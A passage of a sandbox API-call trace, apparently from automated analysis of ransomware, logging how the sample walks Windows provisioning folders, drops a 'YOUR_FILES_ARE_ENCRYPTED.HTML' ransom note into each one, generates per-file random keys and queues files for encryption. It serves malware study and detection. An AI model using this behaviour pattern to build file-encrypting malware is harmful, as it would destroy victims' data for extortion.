(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0106.812] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=343) returned 1 [0106.812] CloseHandle (hObject=0x314) returned 1 [0106.812] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa102a24e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x157, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0106.812] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.812] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0106.812] GetProcessHeap () returned 0x600000 [0106.812] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0106.812] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.813] WriteFile (in: hFile=0x32c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.814] CloseHandle (hObject=0x32c) returned 1 [0106.814] GetProcessHeap () returned 0x600000 [0106.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0106.814] GetProcessHeap () returned 0x600000 [0106.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0106.815] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0106.815] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0106.815] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0106.815] GetProcessHeap () returned 0x600000 [0106.815] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.815] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.816] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.816] CloseHandle (hObject=0x308) returned 1 [0106.817] GetProcessHeap () returned 0x600000 [0106.817] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.817] GetProcessHeap () returned 0x600000 [0106.817] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.818] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{23cb517f-5073-4e96-a202-7fe6122a2271}", cAlternateFileName="{23CB5~1")) returned 1 [0106.818] StrStrIW (lpFirst="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.818] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}") returned 80 [0106.818] GetProcessHeap () returned 0x600000 [0106.818] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.819] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}" [0106.819] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*" [0106.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0106.825] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.825] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa15d3ecf, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa15d3ecf, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa15fa13e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x159d, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0106.825] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.825] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml") returned 99 [0106.825] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.825] lstrlenW (lpString=".xml") returned 4 [0106.825] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.825] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.826] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.826] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=5533) returned 1 [0106.826] GetProcessHeap () returned 0x600000 [0106.826] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0106.828] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="39") returned 2 [0106.828] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="37") returned 2 [0106.828] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="F9") returned 2 [0106.828] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="4E") returned 2 [0106.828] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="11") returned 2 [0106.828] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="B3") returned 2 [0106.828] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="56") returned 2 [0106.828] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="8A") returned 2 [0106.828] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="EC") returned 2 [0106.828] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="37") returned 2 [0106.828] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="ED") returned 2 [0106.828] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="CB") returned 2 [0106.828] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="CD") returned 2 [0106.828] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="E8") returned 2 [0106.828] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="59") returned 2 [0106.829] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="20") returned 2 [0106.829] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="1B") returned 2 [0106.829] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="A8") returned 2 [0106.829] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="FA") returned 2 [0106.829] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="91") returned 2 [0106.829] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="23") returned 2 [0106.829] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="D0") returned 2 [0106.829] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="1D") returned 2 [0106.830] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="C1") returned 2 [0106.830] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="1B") returned 2 [0106.830] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="49") returned 2 [0106.830] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="9E") returned 2 [0106.830] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="F1") returned 2 [0106.830] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="33") returned 2 [0106.830] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="DE") returned 2 [0106.830] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="3F") returned 2 [0106.830] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="3F") returned 2 [0106.830] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" [0106.830] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.830] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0106.831] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1430407, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1430407, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1430407, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0106.831] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.831] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml") returned 100 [0106.831] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.831] lstrlenW (lpString=".xml") returned 4 [0106.831] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.832] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0106.836] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0106.836] CloseHandle (hObject=0x32c) returned 1 [0106.836] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0106.836] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.836] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov") returned 85 [0106.836] GetProcessHeap () returned 0x600000 [0106.836] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0106.839] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov" [0106.839] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*" [0106.839] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.840] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0106.840] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0106.840] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.840] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime") returned 93 [0106.840] GetProcessHeap () returned 0x600000 [0106.840] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.841] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime" [0106.841] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*" [0106.841] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0106.841] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0106.841] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1397a49, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1397a49, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13bdcbd, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0106.841] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.841] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0106.841] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.841] lstrlenW (lpString=".provxml") returned 8 [0106.841] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.842] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0106.842] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.842] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml") returned 109 [0106.842] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.842] lstrlenW (lpString=".provxml") returned 8 [0106.842] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.842] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0 [0106.842] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0106.842] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0106.842] GetProcessHeap () returned 0x600000 [0106.842] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0106.842] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0106.843] WriteFile (in: hFile=0x31c, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0106.844] CloseHandle (hObject=0x31c) returned 1 [0106.845] GetProcessHeap () returned 0x600000 [0106.845] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0106.845] GetProcessHeap () returned 0x600000 [0106.845] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.846] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13e3f24, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13e3f24, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, 